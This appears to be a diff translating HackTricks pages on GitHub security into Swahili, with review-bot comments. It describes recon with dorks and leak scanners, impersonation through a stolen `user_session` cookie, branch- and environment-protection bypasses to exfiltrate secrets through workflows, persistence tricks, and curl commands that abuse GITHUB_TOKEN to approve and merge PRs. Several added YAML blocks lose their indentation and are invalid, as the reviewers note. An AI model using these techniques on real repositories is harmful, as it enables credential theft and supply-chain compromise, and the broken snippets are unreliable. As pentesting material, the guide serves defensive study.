+Github inaruhusu **kutafuta kitu kwa kubainisha kama upeo mtumiaji, repo au shirika**. Hivyo, kwa orodha ya nyuzi ambazo zitakuwa karibu na taarifa nyeti unaweza kwa urahisi **kutafuta taarifa nyeti zinazoweza kuwa katika lengo lako**.
-Tools (each tool contains its list of dorks):
+Tools (kila chombo kina orodha yake ya dorks):
-- [https://github.com/obheda12/GitDorker](https://github.com/obheda12/GitDorker) ([Dorks list](https://github.com/obheda12/GitDorker/tree/master/Dorks))
-- [https://github.com/techgaun/github-dorks](https://github.com/techgaun/github-dorks) ([Dorks list](https://github.com/techgaun/github-dorks/blob/master/github-dorks.txt))
-- [https://github.com/hisxo/gitGraber](https://github.com/hisxo/gitGraber) ([Dorks list](https://github.com/hisxo/gitGraber/tree/master/wordlists))
+- [https://github.com/obheda12/GitDorker](https://github.com/obheda12/GitDorker) ([Orodha ya Dorks](https://github.com/obheda12/GitDorker/tree/master/Dorks))
+- [https://github.com/techgaun/github-dorks](https://github.com/techgaun/github-dorks) ([Orodha ya Dorks](https://github.com/techgaun/github-dorks/blob/master/github-dorks.txt))
+- [https://github.com/hisxo/gitGraber](https://github.com/hisxo/gitGraber) ([Orodha ya Dorks](https://github.com/hisxo/gitGraber/tree/master/wordlists))
### Github Leaks
-Please, note that the github dorks are also meant to search for leaks using github search options. This section is dedicated to those tools that will **download each repo and search for sensitive information in them** (even checking certain depth of commits).
+Tafadhali, kumbuka kwamba github dorks pia zinakusudia kutafuta mvuja taarifa kwa kutumia chaguzi za utafutaji za github. Sehemu hii imejikita kwa zana hizo ambazo zitafanya **kupakua kila repo na kutafuta taarifa nyeti ndani yao** (hata kuangalia kina fulani cha commits).
-Tools (each tool contains its list of regexes):
+Tools (kila chombo kina orodha yake ya regexes):
- [https://github.com/zricethezav/gitleaks](https://github.com/zricethezav/gitleaks)
- [https://github.com/trufflesecurity/truffleHog](https://github.com/trufflesecurity/truffleHog)
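Review bot: `Tools (kila chombo kina orodha yake ya dorks):` and `Tools (kila chombo kina orodha yake ya regexes):` keep the English word `Tools` while translating the parenthetical; either translate the whole lead-in or leave it entirely in English, consistent with the `### Github Dorks` and `### Github Leaks` headings, which this change leaves in English. The tool links and the `Orodha ya Dorks` link labels are otherwise consistent.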
@@ -47,15 +47,15 @@ Tools (each tool contains its list of regexes):
- [https://github.com/awslabs/git-secrets](https://github.com/awslabs/git-secrets)
> [!WARNING]
-> When you look for leaks in a repo and run something like `git log -p` don't forget there might be **other branches with other commits** containing secrets!
+> Unapofanya utafutaji wa mvuja taarifa katika repo na kuendesha kitu kama `git log -p` usisahau kunaweza kuwa na **matawi mengine yenye commits nyingine** yanayoshikilia siri!
### External Forks
-It's possible to **compromise repos abusing pull requests**. To know if a repo is vulnerable you mostly need to read the Github Actions yaml configs. [**More info about this below**](./#execution-from-a-external-fork).
+Inawezekana **kudhoofisha repos kwa kutumia ombi la kuvuta**. Ili kujua ikiwa repo ni hatarishi unahitaji zaidi kusoma mipangilio ya yaml ya Github Actions. [**Maelezo zaidi kuhusu hii hapa chini**](./#execution-from-a-external-fork).
### Github Leaks in deleted/internal forks
-Even if deleted or internal it might be possible to obtain sensitive data from forks of github repositories. Check it here:
+Hata kama zimefutwa au za ndani inaweza kuwa inawezekana kupata data nyeti kutoka kwa forks za github repositories. Angalia hapa:
{{#ref}}
accessible-deleted-data-in-github.md
@@ -65,154 +65,148 @@ accessible-deleted-data-in-github.md
### Member Privileges
-There are some **default privileges** that can be assigned to **members** of the organization. These can be controlled from the page `https://github.com/organizations//settings/member_privileges` or from the [**Organizations API**](https://docs.github.com/en/rest/orgs/orgs).
+Kuna **privileges za msingi** ambazo zinaweza kutolewa kwa **wanachama** wa shirika. Hizi zinaweza kudhibitiwa kutoka kwenye ukurasa `https://github.com/organizations//settings/member_privileges` au kutoka kwenye [**Organizations API**](https://docs.github.com/en/rest/orgs/orgs).
-- **Base permissions**: Members will have the permission None/Read/write/Admin over the org repositories. Recommended is **None** or **Read**.
-- **Repository forking**: If not necessary, it's better to **not allow** members to fork organization repositories.
-- **Pages creation**: If not necessary, it's better to **not allow** members to publish pages from the org repos. If necessary you can allow to create public or private pages.
-- **Integration access requests**: With this enabled outside collaborators will be able to request access for GitHub or OAuth apps to access this organization and its resources. It's usually needed, but if not, it's better to disable it.
- - _I couldn't find this info in the APIs response, share if you do_
-- **Repository visibility change**: If enabled, **members** with **admin** permissions for the **repository** will be able to **change its visibility**. If disabled, only organization owners can change repository visibilities. If you **don't** want people to make things **public**, make sure this is **disabled**.
- - _I couldn't find this info in the APIs response, share if you do_
-- **Repository deletion and transfer**: If enabled, members with **admin** permissions for the repository will be able to **delete** or **transfer** public and private **repositories.**
- - _I couldn't find this info in the APIs response, share if you do_
-- **Allow members to create teams**: If enabled, any **member** of the organization will be able to **create** new **teams**. If disabled, only organization owners can create new teams. It's better to have this disabled.
- - _I couldn't find this info in the APIs response, share if you do_
-- **More things can be configured** in this page but the previous are the ones more security related.
+- **Ruhusa za msingi**: Wanachama watakuwa na ruhusa Hakuna/Soma/andika/Admin juu ya repos za shirika. Inapendekezwa kuwa **Hakuna** au **Soma**.
+- **Kuvuta repo**: Ikiwa si lazima, ni bora **kutokuruhusu** wanachama kuvuta repos za shirika.
+- **Uundaji wa kurasa**: Ikiwa si lazima, ni bora **kutokuruhusu** wanachama kuchapisha kurasa kutoka kwa repos za shirika. Ikiwa ni lazima unaweza kuruhusu kuunda kurasa za umma au binafsi.
+- **Maombi ya ufikiaji wa ushirikiano**: Kwa hili kuwezeshwa washirikiano wa nje wataweza kuomba ufikiaji wa GitHub au programu za OAuth kufikia shirika hili na rasilimali zake. Kwa kawaida inahitajika, lakini ikiwa si hivyo, ni bora kuizima.
+- _Sijapata taarifa hii katika majibu ya APIs, shiriki ikiwa unayo_
+- **Mabadiliko ya mwonekano wa repo**: Ikiwa imewezeshwa, **wanachama** wenye ruhusa **admin** kwa **repo** wataweza **kubadilisha mwonekano wake**. Ikiwa imezimwa, ni wamiliki wa shirika pekee wanaoweza kubadilisha mwonekano wa repos. Ikiwa **hutaki** watu kufanya mambo **ya umma**, hakikisha hii ime **zimwa**.
+- _Sijapata taarifa hii katika majibu ya APIs, shiriki ikiwa unayo_
+- **Futa na uhamasishaji wa repo**: Ikiwa imewezeshwa, wanachama wenye ruhusa **admin** kwa repo wataweza **kufuta** au **kuhamasisha** repos za umma na binafsi.
+- _Sijapata taarifa hii katika majibu ya APIs, shiriki ikiwa unayo_
+- **Ruhusu wanachama kuunda timu**: Ikiwa imewezeshwa, mwanachama yeyote wa shirika ataweza **kuunda** timu mpya. Ikiwa imezimwa, ni wamiliki wa shirika pekee wanaoweza kuunda timu mpya. Ni bora kuwa na hii imezimwa.
+- _Sijapata taarifa hii katika majibu ya APIs, shiriki ikiwa unayo_
+- **Mambo mengine yanaweza kuwekewa mipangilio** katika ukurasa huu lakini yale yaliyotangulia ndiyo yanayohusiana zaidi na usalama.
### Actions Settings
-Several security related settings can be configured for actions from the page `https://github.com/organizations//settings/actions`.
+Mipangilio kadhaa inayohusiana na usalama inaweza kuwekwa kwa ajili ya hatua kutoka kwenye ukurasa `https://github.com/organizations//settings/actions`.
> [!NOTE]
-> Note that all this configurations can also be set on each repository independently
+> Kumbuka kwamba mipangilio hii yote inaweza pia kuwekwa kwenye kila repo kwa kujitegemea
-- **Github actions policies**: It allows you to indicate which repositories can tun workflows and which workflows should be allowed. It's recommended to **specify which repositories** should be allowed and not allow all actions to run.
- - [**API-1**](https://docs.github.com/en/rest/actions/permissions#get-allowed-actions-and-reusable-workflows-for-an-organization)**,** [**API-2**](https://docs.github.com/en/rest/actions/permissions#list-selected-repositories-enabled-for-github-actions-in-an-organization)
-- **Fork pull request workflows from outside collaborators**: It's recommended to **require approval for all** outside collaborators.
- - _I couldn't find an API with this info, share if you do_
-- **Run workflows from fork pull requests**: It's highly **discouraged to run workflows from pull requests** as maintainers of the fork origin will be given the ability to use tokens with read permissions on the source repository.
- - _I couldn't find an API with this info, share if you do_
-- **Workflow permissions**: It's highly recommended to **only give read repository permissions**. It's discouraged to give write and create/approve pull requests permissions to avoid the abuse of the GITHUB_TOKEN given to running workflows.
- - [**API**](https://docs.github.com/en/rest/actions/permissions#get-default-workflow-permissions-for-an-organization)
+- **Sera za hatua za Github**: Inaruhusu kuashiria ni repos zipi zinaweza kuendesha workflows na ni workflows zipi zinapaswa kuruhusiwa. Inapendekezwa **kubainisha ni repos zipi** zinapaswa kuruhusiwa na sio kuruhusu hatua zote kuendesha.
+- [**API-1**](https://docs.github.com/en/rest/actions/permissions#get-allowed-actions-and-reusable-workflows-for-an-organization)**,** [**API-2**](https://docs.github.com/en/rest/actions/permissions#list-selected-repositories-enabled-for-github-actions-in-an-organization)
+- **Kuvuta workflows za ombi kutoka kwa washirikiano wa nje**: Inapendekezwa **kuhitaji idhini kwa wote** washirikiano wa nje.
+- _Sijapata API yenye taarifa hii, shiriki ikiwa unayo_
+- **Kendesha workflows kutoka kwa ombi la kuvuta**: Inashauriwa **kutoendesha workflows kutoka kwa ombi la kuvuta** kwani wasimamizi wa chanzo cha kuvuta watapewa uwezo wa kutumia tokens zenye ruhusa za kusoma kwenye repo ya chanzo.
+- _Sijapata API yenye taarifa hii, shiriki ikiwa unayo_
+- **Ruhusa za workflow**: Inashauriwa sana **kutoa ruhusa za kusoma tu kwa repo**. Inashauriwa kutopeana ruhusa za kuandika na kuunda/kubali ombi la kuvuta ili kuepuka matumizi mabaya ya GITHUB_TOKEN inayotolewa kwa workflows zinazokimbia.
+- [**API**](https://docs.github.com/en/rest/actions/permissions#get-default-workflow-permissions-for-an-organization)
### Integrations
-_Let me know if you know the API endpoint to access this info!_
+_Nnijulishe ikiwa unajua kiunganishi cha API kupata taarifa hii!_
-- **Third-party application access policy**: It's recommended to restrict the access to every application and allow only the needed ones (after reviewing them).
-- **Installed GitHub Apps**: It's recommended to only allow the needed ones (after reviewing them).
+- **Sera ya ufikiaji wa programu za wahusika wengine**: Inapendekezwa kupunguza ufikiaji kwa kila programu na kuruhusu zile tu zinazohitajika (baada ya kuzitathmini).
+- **Programu za GitHub zilizowekwa**: Inapendekezwa kuruhusu zile tu zinazohitajika (baada ya kuzitathmini).
## Recon & Attacks abusing credentials
-For this scenario we are going to suppose that you have obtained some access to a github account.
+Kwa hali hii tutadhani kwamba umepata ufikiaji wa akaunti ya github.
### With User Credentials
-If you somehow already have credentials for a user inside an organization you can **just login** and check which **enterprise and organization roles you have**, if you are a raw member, check which **permissions raw members have**, in which **groups** you are, which **permissions you have** over which **repos,** and **how are the repos protected.**
+Ikiwa kwa namna fulani tayari una ruhusa za mtumiaji ndani ya shirika unaweza **kuingia tu** na kuangalia ni **majukumu gani ya biashara na shirika ulionayo**, ikiwa wewe ni mwanachama wa kawaida, angalia ni **ruhusa zipi wanachama wa kawaida wanao**, ni **makundi** gani ulipo, ni **ruhusa zipi ulizonazo** juu ya **repos**, na **jinsi repos zinavyolindwa**.
-Note that **2FA may be used** so you will only be able to access this information if you can also **pass that check**.
+Kumbuka kwamba **2FA inaweza kutumika** hivyo utaweza kufikia taarifa hii tu ikiwa unaweza pia **kupita ukaguzi huo**.
> [!NOTE]
-> Note that if you **manage to steal the `user_session` cookie** (currently configured with SameSite: Lax) you can **completely impersonate the user** without needing credentials or 2FA.
+> Kumbuka kwamba ikiwa **utafanikiwa kuiba `user_session` cookie** (sasa imewekwa na SameSite: Lax) unaweza **kujifanya kuwa mtumiaji** bila kuhitaji ruhusa au 2FA.
-Check the section below about [**branch protections bypasses**](./#branch-protection-bypass) in case it's useful.
+Angalia sehemu iliyo chini kuhusu [**kupita ulinzi wa matawi**](./#branch-protection-bypass) ikiwa itakuwa na manufaa.
### With User SSH Key
-Github allows **users** to set **SSH keys** that will be used as **authentication method to deploy code** on their behalf (no 2FA is applied).
-
-With this key you can perform **changes in repositories where the user has some privileges**, however you can not sue it to access github api to enumerate the environment. However, you can get **enumerate local settings** to get information about the repos and user you have access to:
+Github inaruhusu **watumiaji** kuweka **SSH keys** ambazo zitakuwa zikitumika kama **njia ya uthibitisho wa kupeleka msimbo** kwa niaba yao (hakuna 2FA inayotumika).
+Kwa funguo hii unaweza kufanya **mabadiliko katika repos ambapo mtumiaji ana baadhi ya ruhusa**, hata hivyo huwezi kuitumia kufikia api ya github ili kuorodhesha mazingira. Hata hivyo, unaweza kupata **kuorodhesha mipangilio ya ndani** ili kupata taarifa kuhusu repos na mtumiaji ulionao ufikiaji:
```bash
# Go to the the repository folder
# Get repo config and current user name and email
git config --list
```
+Ikiwa mtumiaji ameweka jina lake la mtumiaji kama jina lake la github unaweza kufikia **funguo za umma alizoweka** katika akaunti yake kwenye _https://github.com/\.keys_, unaweza kuangalia hili kuthibitisha kuwa funguo ya faragha uliyopata inaweza kutumika.
-If the user has configured its username as his github username you can access the **public keys he has set** in his account in _https://github.com/\.keys_, you could check this to confirm the private key you found can be used.
+**Funguo za SSH** zinaweza pia kuwekwa katika hifadhi kama **funguo za kutekeleza**. Mtu yeyote mwenye ufikiaji wa funguo hii ataweza **kuanzisha miradi kutoka kwenye hifadhi**. Kawaida katika seva yenye funguo tofauti za kutekeleza, faili ya ndani **`~/.ssh/config`** itakupa taarifa kuhusu funguo inayohusiana.
-**SSH keys** can also be set in repositories as **deploy keys**. Anyone with access to this key will be able to **launch projects from a repository**. Usually in a server with different deploy keys the local file **`~/.ssh/config`** will give you info about key is related.
+#### Funguo za GPG
-#### GPG Keys
-
-As explained [**here**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/github-security/broken-reference/README.md) sometimes it's needed to sign the commits or you might get discovered.
-
-Check locally if the current user has any key with:
+Kama ilivyoelezwa [**hapa**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/github-security/broken-reference/README.md) wakati mwingine inahitajika kusaini commits au unaweza kugunduliwa.
+Angalia kwa ndani ikiwa mtumiaji wa sasa ana funguo yoyote kwa:
```shell
gpg --list-secret-keys --keyid-format=long
```
+### Kwa Token ya Mtumiaji
-### With User Token
+Kwa utangulizi kuhusu [**Token za Mtumiaji angalia taarifa za msingi**](basic-github-information.md#personal-access-tokens).
-For an introduction about [**User Tokens check the basic information**](basic-github-information.md#personal-access-tokens).
+Token ya mtumiaji inaweza kutumika **badala ya nenosiri** kwa Git kupitia HTTPS, au inaweza kutumika [**kujiandikisha kwenye API kupitia Uthibitishaji wa Msingi**](https://docs.github.com/v3/auth/#basic-authentication). Kulingana na mamlaka iliyounganishwa nayo unaweza kuwa na uwezo wa kufanya vitendo tofauti.
-A user token can be used **instead of a password** for Git over HTTPS, or can be used to [**authenticate to the API over Basic Authentication**](https://docs.github.com/v3/auth/#basic-authentication). Depending on the privileges attached to it you might be able to perform different actions.
+Token ya Mtumiaji inaonekana kama hii: `ghp_EfHnQFcFHX6fGIu5mpduvRiYR584kK0dX123`
-A User token looks like this: `ghp_EfHnQFcFHX6fGIu5mpduvRiYR584kK0dX123`
+### Kwa Programu ya Oauth
-### With Oauth Application
+Kwa utangulizi kuhusu [**Programu za Oauth za Github angalia taarifa za msingi**](basic-github-information.md#oauth-applications).
-For an introduction about [**Github Oauth Applications check the basic information**](basic-github-information.md#oauth-applications).
+Mshambuliaji anaweza kuunda **Programu ya Oauth yenye uharibifu** ili kupata data/matendo ya kipaumbele ya watumiaji wanaokubali labda kama sehemu ya kampeni ya udukuzi.
-An attacker might create a **malicious Oauth Application** to access privileged data/actions of the users that accepts them probably as part of a phishing campaign.
+Hizi ni [mipaka ambayo programu ya Oauth inaweza kuomba](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps). Ni lazima kila wakati kuangalia mipaka inayohitajika kabla ya kuzikubali.
-These are the [scopes an Oauth application can request](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps). A should always check the scopes requested before accepting them.
+Zaidi ya hayo, kama ilivyoelezwa katika taarifa za msingi, **mashirika yanaweza kutoa/kukataa ufikiaji kwa programu za upande wa tatu** kwa habari/repo/matendo yanayohusiana na shirika.
-Moreover, as explained in the basic information, **organizations can give/deny access to third party applications** to information/repos/actions related with the organisation.
+### Kwa Programu ya Github
-### With Github Application
+Kwa utangulizi kuhusu [**Programu za Github angalia taarifa za msingi**](basic-github-information.md#github-applications).
-For an introduction about [**Github Applications check the basic information**](basic-github-information.md#github-applications).
+Mshambuliaji anaweza kuunda **Programu ya Github yenye uharibifu** ili kupata data/matendo ya kipaumbele ya watumiaji wanaokubali labda kama sehemu ya kampeni ya udukuzi.
-An attacker might create a **malicious Github Application** to access privileged data/actions of the users that accepts them probably as part of a phishing campaign.
+Zaidi ya hayo, kama ilivyoelezwa katika taarifa za msingi, **mashirika yanaweza kutoa/kukataa ufikiaji kwa programu za upande wa tatu** kwa habari/repo/matendo yanayohusiana na shirika.
-Moreover, as explained in the basic information, **organizations can give/deny access to third party applications** to information/repos/actions related with the organisation.
+## Kuathiri & Kutumia Vibaya Github Action
-## Compromise & Abuse Github Action
-
-There are several techniques to compromise and abuse a Github Action, check them here:
+Kuna mbinu kadhaa za kuathiri na kutumia vibaya Github Action, angalia hapa:
{{#ref}}
abusing-github-actions/
{{#endref}}
-## Branch Protection Bypass
+## Kupita Ulinzi wa Tawi
-- **Require a number of approvals**: If you compromised several accounts you might just accept your PRs from other accounts. If you just have the account from where you created the PR you cannot accept your own PR. However, if you have access to a **Github Action** environment inside the repo, using the **GITHUB_TOKEN** you might be able to **approve your PR** and get 1 approval this way.
- - _Note for this and for the Code Owners restriction that usually a user won't be able to approve his own PRs, but if you are, you can abuse it to accept your PRs._
-- **Dismiss approvals when new commits are pushed**: If this isnāt set, you can submit legit code, wait till someone approves it, and put malicious code and merge it into the protected branch.
-- **Require reviews from Code Owners**: If this is activated and you are a Code Owner, you could make a **Github Action create your PR and then approve it yourself**.
- - When a **CODEOWNER file is missconfigured** Github doesn't complain but it does't use it. Therefore, if it's missconfigured it's **Code Owners protection isn't applied.**
-- **Allow specified actors to bypass pull request requirements**: If you are one of these actors you can bypass pull request protections.
-- **Include administrators**: If this isnāt set and you are admin of the repo, you can bypass this branch protections.
-- **PR Hijacking**: You could be able to **modify the PR of someone else** adding malicious code, approving the resulting PR yourself and merging everything.
-- **Removing Branch Protections**: If you are an **admin of the repo you can disable the protections**, merge your PR and set the protections back.
-- **Bypassing push protections**: If a repo **only allows certain users** to send push (merge code) in branches (the branch protection might be protecting all the branches specifying the wildcard `*`).
- - If you have **write access over the repo but you are not allowed to push code** because of the branch protection, you can still **create a new branch** and within it create a **github action that is triggered when code is pushed**. As the **branch protection won't protect the branch until it's created**, this first code push to the branch will **execute the github action**.
+- **Hitaji idadi ya idhini**: Ikiwa umeathiri akaunti kadhaa unaweza kukubali PR zako kutoka kwa akaunti nyingine. Ikiwa una akaunti tu kutoka ambapo ulitengeneza PR huwezi kukubali PR yako mwenyewe. Hata hivyo, ikiwa una ufikiaji wa mazingira ya **Github Action** ndani ya repo, ukitumia **GITHUB_TOKEN** unaweza kuwa na uwezo wa **kuidhinisha PR yako** na kupata idhini 1 kwa njia hii.
+- _Kumbuka kwa hili na kwa kizuizi cha Wamiliki wa Kanuni kwamba kwa kawaida mtumiaji hatakuwa na uwezo wa kuidhinisha PR zake mwenyewe, lakini ikiwa wewe ni, unaweza kuitumia vibaya kukubali PR zako._
+- **Futa idhini wakati mabadiliko mapya yanaposhughulikiwa**: Ikiwa hii haijakamilishwa, unaweza kuwasilisha msimbo halali, subiri mtu apitishe, na kuweka msimbo mbaya na kuunganisha kwenye tawi lililohifadhiwa.
+- **Hitaji mapitio kutoka kwa Wamiliki wa Kanuni**: Ikiwa hii imewashwa na wewe ni Mmiliki wa Kanuni, unaweza kufanya **Github Action kuunda PR yako na kisha kuidhinisha mwenyewe**.
+- Wakati **faili ya CODEOWNER imepangwa vibaya** Github hailalamiki lakini haitatumia. Kwa hivyo, ikiwa imepangwa vibaya **ulinzi wa Wamiliki wa Kanuni hauwezi kutumika.**
+- **Ruhusu wahusika maalum kupita mahitaji ya ombi la kuvuta**: Ikiwa wewe ni mmoja wa wahusika hawa unaweza kupita ulinzi wa ombi la kuvuta.
+- **Jumuisha wasimamizi**: Ikiwa hii haijakamilishwa na wewe ni msimamizi wa repo, unaweza kupita ulinzi huu wa tawi.
+- **Kuhujumu PR**: Unaweza kuwa na uwezo wa **kubadilisha PR ya mtu mwingine** kwa kuongeza msimbo mbaya, kuidhinisha PR inayotokana na hiyo mwenyewe na kuunganisha kila kitu.
+- **Kuondoa Ulinzi wa Tawi**: Ikiwa wewe ni **msimamizi wa repo unaweza kuzima ulinzi**, kuunganisha PR yako na kuweka ulinzi tena.
+- **Kupita ulinzi wa kusukuma**: Ikiwa repo **inaruhusu watumiaji fulani tu** kutuma kusukuma (kuunganisha msimbo) katika matawi (ulinzi wa tawi unaweza kuwa unalinda matawi yote kwa kubainisha wildcard `*`).
+- Ikiwa una **ufikiaji wa kuandika juu ya repo lakini hujapewa ruhusa ya kusukuma msimbo** kwa sababu ya ulinzi wa tawi, bado unaweza **kuunda tawi jipya** na ndani yake kuunda **github action inayozinduliwa wakati msimbo unasukumwa**. Kwa kuwa **ulinzi wa tawi hautalinda tawi hadi litakapotengenezwa**, kusukuma msimbo huu wa kwanza kwenye tawi uta **zindua github action**.
-## Bypass Environments Protections
+## Kupita Ulinzi wa Mazingira
-For an introduction about [**Github Environment check the basic information**](basic-github-information.md#git-environments).
+Kwa utangulizi kuhusu [**Mazingira ya Github angalia taarifa za msingi**](basic-github-information.md#git-environments).
-In case an environment can be **accessed from all the branches**, it's **isn't protected** and you can easily access the secrets inside the environment. Note that you might find repos where **all the branches are protected** (by specifying its names or by using `*`) in that scenario, **find a branch were you can push code** and you can **exfiltrate** the secrets creating a new github action (or modifying one).
-
-Note, that you might find the edge case where **all the branches are protected** (via wildcard `*`) it's specified **who can push code to the branches** (_you can specify that in the branch protection_) and **your user isn't allowed**. You can still run a custom github action because you can create a branch and use the push trigger over itself. The **branch protection allows the push to a new branch so the github action will be triggered**.
+Katika kesi mazingira yanaweza **kupatikana kutoka matawi yote**, **hayana ulinzi** na unaweza kwa urahisi kupata siri ndani ya mazingira. Kumbuka kwamba unaweza kupata repo ambapo **matawi yote yanahifadhiwa** (kwa kubainisha majina yake au kwa kutumia `*`) katika hali hiyo, **tafuta tawi ambapo unaweza kusukuma msimbo** na unaweza **kuondoa** siri kwa kuunda github action mpya (au kubadilisha moja).
+Kumbuka, kwamba unaweza kupata hali ya mwisho ambapo **matawi yote yanahifadhiwa** (kupitia wildcard `*`) imebainishwa **nani anaweza kusukuma msimbo kwenye matawi** (_unaweza kubainisha hiyo katika ulinzi wa tawi_) na **mtumiaji wako hajaruhusiwa**. Bado unaweza kuendesha github action maalum kwa sababu unaweza kuunda tawi na kutumia kichocheo cha kusukuma juu yake mwenyewe. **Ulinzi wa tawi unaruhusu kusukuma kwenye tawi jipya hivyo github action itazinduliwa**.
```yaml
push: # Run it when a push is made to a branch
- branches:
- - current_branch_name #Use '**' to run when a push is made to any branch
+branches:
+- current_branch_name #Use '**' to run when a push is made to any branch
```
-
-Note that **after the creation** of the branch the **branch protection will apply to the new branch** and you won't be able to modify it, but for that time you will have already dumped the secrets.
+Note that **baada ya kuunda** the branch the **branch protection itatumika kwa tawi jipya** and you won't be able to modify it, but for that time you will have already dumped the secrets.
## Persistence
- Generate **user token**
- Steal **github tokens** from **secrets**
- - **Deletion** of workflow **results** and **branches**
+- **Deletion** of workflow **results** and **branches**
- Give **more permissions to all the org**
- Create **webhooks** to exfiltrate information
- Invite **outside collaborators**
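Review bot: the de-indented YAML snippet is no longer valid for what it shows: `branches:` and `- current_branch_name` were children of `push:` and are now at column 0, so `push:` becomes an empty key and `branches` a sibling of it, which GitHub would not accept as a trigger; keep both lines indented under `push:` as in the removed version. The same indentation loss flattens nested bullets into top-level ones (`- _Kumbuka kwa hili...`, `- Wakati **faili ya CODEOWNER...`, `- Ikiwa una **ufikiaji wa kuandika...` and, under Persistence, `- **Deletion** of workflow **results** and **branches**`), changing the list structure, and the removed blank lines between paragraphs (for example between `Github inaruhusu **watumiaji**...` and `Kwa funguo hii...`, and between `Kama ilivyoelezwa [**hapa**]...` and `Angalia kwa ndani...`) merge them into a single Markdown paragraph. One line is only half translated and mixes both languages: `Note that **baada ya kuunda** the branch the **branch protection itatumika kwa tawi jipya** and you won't be able to modify it...`; finish it or keep the English. Translation nits: `ruhusa` (permissions) is used for "credentials" in the `user_session` tip and "completely" is dropped from "completely impersonate". Pre-existing in both the removed and added line: `_https://github.com/\.keys_` has lost the username placeholder between `github.com/` and `.keys`, so the URL as shown is not usable.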
@@ -224,25 +218,19 @@ Note that **after the creation** of the branch the **branch protection will appl
In Github it's possible to **create a PR to a repo from a fork**. Even if the PR is **not accepted**, a **commit** id inside the orginal repo is going to be created for the fork version of the code. Therefore, an attacker **could pin to use an specific commit from an apparently ligit repo that wasn't created by the owner of the repo**.
-Like [**this**](https://github.com/actions/checkout/commit/c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e):
-
+Like [**hii**](https://github.com/actions/checkout/commit/c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e):
```yaml
name: example
on: [push]
jobs:
- commit:
- runs-on: ubuntu-latest
- steps:
- - uses: actions/checkout@c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e
- - shell: bash
- run: |
- echo 'hello world!'
+commit:
+runs-on: ubuntu-latest
+steps:
+- uses: actions/checkout@c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e
+- shell: bash
+run: |
+echo 'hello world!'
```
-
-For more info check [https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd](https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd)
+Kwa maelezo zaidi angalia [https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd](https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd)
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
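Review bot: the `jobs:` block has lost all its nesting (`commit:`, `runs-on:`, `steps:`, `- uses: actions/checkout@c7d749a2...`, `run: |` and `echo 'hello world!'` all at column 0), so the example is no longer valid YAML and no longer reads as a workflow pinned to the imposter commit the paragraph describes; restore the indentation from the removed lines. Also `Like [**hii**](...)` translates only the link text and leaves "Like" in English; translate the whole sentence or none of it. Dropping the trailing empty lines before `diff --git` is fine.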
diff --git a/src/pentesting-ci-cd/github-security/abusing-github-actions/README.md b/src/pentesting-ci-cd/github-security/abusing-github-actions/README.md
index c5ce0467b..df16c78ef 100644
--- a/src/pentesting-ci-cd/github-security/abusing-github-actions/README.md
+++ b/src/pentesting-ci-cd/github-security/abusing-github-actions/README.md
@@ -8,10 +8,10 @@ In this page you will find:
- A **summary of all the impacts** of an attacker managing to access a Github Action
- Different ways to **get access to an action**:
- - Having **permissions** to create the action
- - Abusing **pull request** related triggers
- - Abusing **other external access** techniques
- - **Pivoting** from an already compromised repo
+- Having **permissions** to create the action
+- Abusing **pull request** related triggers
+- Abusing **other external access** techniques
+- **Pivoting** from an already compromised repo
- Finally, a section about **post-exploitation techniques to abuse an action from inside** (cause the mentioned impacts)
## Impacts Summary
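Review bot: the four items from `- Having **permissions** to create the action` to `- **Pivoting** from an already compromised repo` were sub-bullets of `- Different ways to **get access to an action**:` and are now top-level siblings, so the rendered list no longer presents them as the ways of getting access; keep the two-space indent. Nothing in this hunk is translated, so the indentation loss is the only change it makes.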
@@ -22,7 +22,7 @@ If you can **execute arbitrary code in GitHub Actions** within a **repository**,
- **Steal secrets** mounted to the pipeline and **abuse the pipeline's privileges** to gain unauthorized access to external platforms, such as AWS and GCP.
- **Compromise deployments** and other **artifacts**.
- - If the pipeline deploys or stores assets, you could alter the final product, enabling a supply chain attack.
+- If the pipeline deploys or stores assets, you could alter the final product, enabling a supply chain attack.
- **Execute code in custom workers** to abuse computing power and pivot to other systems.
- **Overwrite repository code**, depending on the permissions associated with the `GITHUB_TOKEN`.
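Review bot: `- If the pipeline deploys or stores assets, you could alter the final product...` was a sub-bullet under `- **Compromise deployments** and other **artifacts**.` and is now a sibling; restore the indentation so the supply-chain remark stays attached to the deployments item. As in the previous hunk, no text is translated here, so this hunk only flattens the list.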
@@ -46,191 +46,177 @@ Some interesting things you can do with this token:
{{#tabs }}
{{#tab name="Merge PR" }}
-
```bash
# Merge PR
curl -X PUT \
- https://api.github.com/repos///pulls//merge \
- -H "Accept: application/vnd.github.v3+json" \
- --header "authorization: Bearer $GITHUB_TOKEN" \
- --header "content-type: application/json" \
- -d "{\"commit_title\":\"commit_title\"}"
+https://api.github.com/repos///pulls//merge \
+-H "Accept: application/vnd.github.v3+json" \
+--header "authorization: Bearer $GITHUB_TOKEN" \
+--header "content-type: application/json" \
+-d "{\"commit_title\":\"commit_title\"}"
```
-
{{#endtab }}
{{#tab name="Approve PR" }}
-
```bash
# Approve a PR
curl -X POST \
- https://api.github.com/repos///pulls//reviews \
- -H "Accept: application/vnd.github.v3+json" \
- --header "authorization: Bearer $GITHUB_TOKEN" \
- --header 'content-type: application/json' \
- -d '{"event":"APPROVE"}'
+https://api.github.com/repos///pulls//reviews \
+-H "Accept: application/vnd.github.v3+json" \
+--header "authorization: Bearer $GITHUB_TOKEN" \
+--header 'content-type: application/json' \
+-d '{"event":"APPROVE"}'
```
-
{{#endtab }}
-{{#tab name="Create PR" }}
-
+{{#tab name="Unda PR" }}
```bash
# Create a PR
curl -X POST \
- -H "Accept: application/vnd.github.v3+json" \
- --header "authorization: Bearer $GITHUB_TOKEN" \
- --header 'content-type: application/json' \
- https://api.github.com/repos///pulls \
